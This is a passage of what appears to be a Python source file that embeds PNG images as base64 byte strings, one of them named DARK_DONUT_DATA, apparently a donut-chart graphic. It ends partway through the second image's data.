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'
DARK_DONUT_DATA = b'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